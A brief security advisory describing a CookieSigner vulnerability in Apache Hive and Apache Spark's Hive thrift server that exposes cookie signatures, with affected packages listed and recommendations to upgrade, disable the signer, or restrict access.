Hamza Tahmi

**Name of the Vulnerable Software and Affected Versions** Apache Hive versions 1.2.0 and later Apache Spark versions 2.0.0 and later **Description** The issue is related to the exposure of digital signatures in cookie data, which can lead to security vulnerabilities and exploitation. The vulnerable CookieSigner logic was introduced in Apache Hive and Apache Spark, allowing malicious actors to modify cookie values. The affected components include org.apache.hive:hive-service, org.apache.spark:spark-hive-thriftserver 2.11, and org.apache.spark:spark-hive-thriftserver 2.12. Exposing the correct cookie signature can lead to further exploitation. **Recommendations** For Apache Hive version 1.2.0 and later, update to a version that fixes the vulnerable CookieSigner logic. For Apache Spark version 2.0.0 and later, update to a version that fixes the vulnerable CookieSigner logic. As a temporary workaround, consider disabling the `CookieSigner` function until a patch is available. Restrict access to the affected components, including org.apache.hive:hive-service, org.apache.spark:spark-hive-thriftserver 2.11, and org.apache.spark:spark-hive-thriftserver 2.12, to minimize the risk of exploitation.